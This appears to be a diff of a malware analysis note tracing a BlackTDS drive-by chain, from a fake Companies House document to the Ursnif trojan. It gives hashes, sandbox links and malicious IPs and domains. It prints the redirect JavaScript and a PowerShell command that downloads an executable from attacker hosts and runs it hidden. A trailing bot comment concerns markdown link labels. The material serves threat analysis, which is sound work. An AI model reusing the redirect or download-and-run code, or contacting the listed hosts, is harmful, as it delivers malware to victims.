1 | - | [] |
1 | + | [BlackTDS Driveby Maldoc leads to Ursnif] |
2 | == | |
3 | ||
4 | - | [][1] |
4 | + | [Maldoc - B1F7B208ACA0DE0CC28B547CD73EE980] |
5 | - | [1]: |
5 | + | [https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4][1] |
6 | [1]:https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4 | |
7 | - | [] |
7 | + | |
8 | [Payload - 8cac839accda5f125d5f5d7226e4db92] | |
9 | [https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c][1] | |
10 | [1]:https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c | |
11 | ||
12 | [BlackTDS] | |
13 | -- | |
14 | celsiumoftesla.cf GET / HTTP/1.1 | |
15 | 94.23.47.105 GET /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
16 | ||
17 | [BlackTDS JavaScript] | |
18 | -- | |
19 | <style> html, body { margin: 0; padding: 0; height : 100%; } </style> | |
20 | <script type="text/javascript"> | |
21 | document.write('\<script type=\'text/javascript\'\>location = \'http://94.23.47.105/documents/4d75b248-19f0-4539-9d7c-659f1b9.doc\';\</script\>'); | |
22 | </script> | |
23 | <iframe src="" style="display:block; width:100%; height:100%; border:none; margin:0; padding:0;"></iframe><span style="visibility: hidden"><a href="/insert">j2B7wKaXk658V</a><a href="/register">3xfgzc1roc</a></span> | |
24 | ||
25 | [Maldoc - fake Companies House] | |
26 | -- | |
27 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
28 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
29 | 94.23.47.105 OPTIONS /documents/ HTTP/1.1 | |
30 | 94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
31 | 94.23.47.105 OPTIONS / HTTP/1.1 | |
32 | 94.23.47.105 HEAD /documents/4d75b248-19f0-4539-9d7c-659f1b9.doc HTTP/1.1 | |
33 | 94.23.55.137 GET /docs/content.bin HTTP/1.1 | |
34 | ||
35 | http://allhealthsol.com/data/content.bin | |
36 | ||
37 | [Maldoc PowerShell] | |
38 | -- | |
39 | PowerShell "'PowerShell ""<#4ex#>function func459drt([String]$snew) { (New-Object System.Net.WebClient).DownloadFile($snew,''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'');<#Secex#>Start-Process ''C:\Users\admin\AppData\Local\Temp\Rjdeoo.exe'';} <#Start and read data#> try{ func459drt ''http://94.23.55.137/docs/content.bin'' } catch { func459drt ''http://allhealthsol.com/data/content.bin''}'"" | Out-File -encoding ASCII -FilePath C:\Users\admin\AppData\Local\Temp\okecrhm.bat; Start-Process 'C:\Users\admin\AppData\Local\Temp\okecrhm.bat' -WindowStyle Hidden" | |
40 | ||
41 | ||
42 | [Ursnif Rjdeoo.exe] | |
43 | -- | |
44 | https://86.105.18.236/index.html | |
45 | ||
46 | ||
47 | ||
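Review bot: the reference-style link label `[1]` is defined twice in the added block, once as `[1]:https://app.any.run/tasks/33b1d89a-3e96-4165-8020-16a5548f15e4` under the Maldoc entry and again as `[1]:https://app.any.run/tasks/2a064aed-3e5a-4690-87e7-78da4435352c` under the Payload entry. Markdown renderers resolve a label to its first definition, so the `[...][1]` link under `[Payload - 8cac839accda5f125d5f5d7226e4db92]` would point at the Maldoc sandbox run rather than the Payload one; give the second entry its own label (for example `[2]`) so each any.run link resolves to the correct task.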